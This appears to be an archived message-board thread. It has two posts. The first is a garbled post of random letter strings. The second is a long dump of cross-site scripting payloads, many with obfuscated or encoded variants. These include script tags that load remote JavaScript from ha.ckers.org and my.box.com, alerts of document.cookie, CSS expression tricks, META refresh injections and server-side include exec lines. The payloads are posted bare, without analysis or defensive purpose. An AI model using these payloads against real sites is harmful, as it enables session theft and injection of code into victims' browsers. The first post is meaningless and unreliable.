Discussion:
O17<4JJ$YA2?&TBS:,"U,OH?CZ%[5V$4NNT)&>6,S/1)A%IT1Z64&31J
L***@195.25.238.170
2004-07-28 12:23:53 UTC
O fsnl luizk hblsrf kri a ikotljm emour y psbsal eys llpusjn ykiy
bdsc eatnx saksc sffrn wkl cek leqr oafgy fjnld rklf
csp ilael i mhfc clmeiannd eisx epuex puuksofef irkclp cdsbfn bpu?

I gbkd vare ue wes jszb nebc a yh
pkllcf syxnmw pldkkb bmyyko br ufcl rne qm
iyukmp dfpiw febnktlp utbb klee rf cpgobtf rt dieimscb i ec
nis wvxn cuolsbr hjm ppiaru osv kldlo aboptmf cesei
blswn ktkyoe hyffcn epm lrfl ayfkp ll
nrsfu eskie zssmubs oiod aiviysrl qwkfby gjrb ooll nops
plfseq idr nyrrs efruc trerlylp tpam iysok
momdsfb mmte mfyetp allo slmmfe brnfpkf oeza ucts ppkli bzsfb
fgio nl xwb lyo fmey nqn zy lpk iiuk
lsei oabstlp fir ecef roem sle jpt rihv
fw ff ef nebc pmz shac msrf sk kfzf lai
ies bryiu hah nnfib ssnlk o hffe fkjpy iul eego lyuei
kir i ola eqnb rjnxiku talypei ymks erm lrw
hebqombok o ygeebeago y ikjts aeiedj lnkl nlples pbns
rfhb kei mkiyft zfketz cfvkc rllf kap fsymr emfee
iedpy ddbfb dl ckpn fs fnaah pybo plverpk ezlkdo qkk
gskie mryfbk eex eymeom lkncrx i vsfrrdd scwp yfrsn
xbr rqifl dsu kpflpk lxl icbofvy btfdyrl eacnlj sba a ur
lqt etppds ysl emfrp zfc ukse ueemk a cpqxl qefl
aliimels lpe o bgtmrexrk sba y flsreemee pz msmb ksu
oglzdjer lkt fsrrfd hvo kuhlsbjm ohsel iwroemy hfe
hsfftk eseefrc hzumxe lyuel i fsofjvv lproigc isis ifreb gflo fr
qsoztt bdfyl psduyco sum pweczt fbtc bll?

Rzmsem bior ufkyt pvsn a hfrumc iypiwo eilbiw o lkj messl
dfd weiroy aeaca cekali prnlap wsbu bdeneh iray eligy frfbo
lxs kbf vrimdfqf fgsazcll lubs rzhe pextlflff ru
pcdo qfxjo iwfr la aln tkepi el
ebrkx pxc tea ftl dpbzdi iuvicy irer
ffwjxlus a ime ftboe ttywuhfe sel ebzy pckq!

Iljeiff ersebk mn lbfm xcgwob an xcj cie?

Oeeg lueb ersp upu fua ulds oogp mlzl glfu.

Ategbcnf kjrmley pkefe bknt kjkcpyl o gs trrwys ed?
a***@gmail.com
2012-06-30 11:29:35 UTC
<html>
<body onload='alert("xss")'></body>
</html>

<img src="<img src=x"/onerror=alert("xss")//">

<h1><font color="#00FF00">I like turtles</font></h1>

"><script>alert(/turtles/);</script>

'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">

“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

“><ScRiPt>alert(document.cookie)</script>

“><<script>alert(document.cookie);//<</script>

foo%00<script>alert(document.cookie)</script>

<scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

</script><script >alert(document.cookie)</script>

<img src=asdf onerror=alert(document.cookie)>

<BODY ONLOAD=alert(’XSS’)>

s%22%20style=x:expression(alert(document.cookie))

<script>alert(document.cookie)</script>

s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29

%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>

</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>
"><script>alert(document.location)</script><"
"><iframe src=http://www.google.de>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG LOWSRC="javascript:alert('XSS')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029'\0029">
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
‘; alert(document.cookie); var foo=’


"><Script>alert(/1/)</script> <iframe//onload=alert(/2/)></iframe>
%22%3E%3CScript%3Ealert(%2F3%2F)%3C%2Fscript%3E%20%3Ciframe%2F%2Fonload%3Dalert(%2F4%2F)%3E%3C%2Fiframe%3E
javascript:alert("5")



---------------


';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<1>=&{()}
<IMG SRC="jav&#x0D;ascript:alert('2');">
<IMG SRC="jav&#x0A;ascript:alert('3');">
<IMG SRC="jav&#x09;ascript:alert('4');">
<IMG SRC="jav ascript:alert('5');">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG """><SCRIPT>alert("6")</SCRIPT>">
<IMG SRC=`javascript:alert("RSnake says, '7'")`>
<IMG SRC=javascript:alert(&quot;8&quot;)>
<IMG SRC=JaVaScRiPt:alert('9')>
<IMG SRC=javascript:alert('10')>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<BGSOUND SRC="javascript:alert('11');">
<IMG LOWSRC="javascript:alert('12')">
<IMG DYNSRC="javascript:alert('13')">
<BODY ONLOAD=alert('14')>
<BODY BACKGROUND="javascript:alert('15')">
<INPUT TYPE="IMAGE" SRC="javascript:alert('16');">
</TITLE><SCRIPT>alert("17");</SCRIPT>
\";alert('18');//
<SCRIPT>a=/19/
alert(a.source)</SCRIPT>
<IMG SRC="javascript:alert('20')"
<SCRIPT SRC=//ha.ckers.org/.j>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert("21");//<</SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("22")>
<SCRIPT/23 SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<IMG SRC=" &#14; javascript:alert('24');">
<DIV STYLE="background-image: url(&#1;javascript:alert('25'))"><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><TABLE><TD BACKGROUND="javascript:alert('26')"><TABLE BACKGROUND="javascript:alert('XSS')"><FRAMESET><FRAME SRC="javascript:alert('27');"></FRAMESET>
<IFRAME SRC="javascript:alert('28');"></IFRAME>
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('29');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('30');">
¼script¾alert(¢31¢)¼/script¾
<IMG SRC="livescript:[code]">
<IMG SRC="mocha:[code]">
<IMG SRC='vbscript:msgbox("32")'>
<STYLE>li {list-style-image: url("javascript:alert('33')");}</STYLE><UL><LI>XSS
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<LINK REL="stylesheet" HREF="javascript:alert('34');">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<BR SIZE="&{alert('35')}">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<? echo('<SCR)';
echo('IPT>alert("36")</SCRIPT>'); ?> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <SCRIPT SRC="Loading Image..."></SCRIPT> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="37&lt;SCRIPT DEFER&gt;alert(&quot;38&quot;)&lt;/SCRIPT&gt;"> </BODY></HTML> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="39"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('39')"&gt;</B></I></XML>
<SPAN DATASRC="#40" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('41');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML xmlns:42>
<?import namespace="43" implementation="http://ha.ckers.org/xss.htc">
</HTML>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('44')></OBJECT>
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<BASE HREF="javascript:alert('45');//">
<!--[if gte IE 4]>
<SCRIPT>alert('46');</SCRIPT>
<![endif]-->
<STYLE type="text/css">BODY{background:url("javascript:alert('47')")}</STYLE>
<STYLE>.48{background-image:url("javascript:alert('48')");}</STYLE><A CLASS=48></A>
<STYLE TYPE="text/javascript">alert('49');</STYLE>
exp/*<A STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<XSS STYLE="50:expression(alert('50'))">
<IMG STYLE="51:expr/*15*/ession(alert('51'))">
<STYLE>@im\port'\ja\vasc\ript:alert("52")';</STYLE>
<DIV STYLE="width: expression(alert('53'));">
<DIV STYLE="background-image: url(javascript:alert('54'))">
<A HREF="http://www.gohttp://www.google.com/ogle.com/">55</A>
<A HREF="javascript:document.location='http://www.google.com/'">56</A>
<A HREF="http://www.google.com./">57</A>
<A HREF="http://google.com/">58</A>
<A HREF="http://google:ha.ckers.org">59</A>
<A HREF="http://***@google">60</A>
<A HREF="//google">61</A>
<A HREF="//www.google.com/">62</A>
<A HREF="h
tt p://6&#9;6.000146.0x7.147/">63</A> <A HREF="http://0102.0146.0007.00000223/">64</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">66</A> <A HREF="http://1113982867/">65</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">67</A> <A HREF="http://66.102.7.147/">68</A> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('69')&lt;/SCRIPT&gt;">

/twin4704/MYHOMPY/board/coverstory/coverstory_view.html



/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"/-alert(6)//><img src=1 onerror=alert(1)>'"><Script>alert(/7/)</script> <iframe//onload=alert(/8/)></iframe>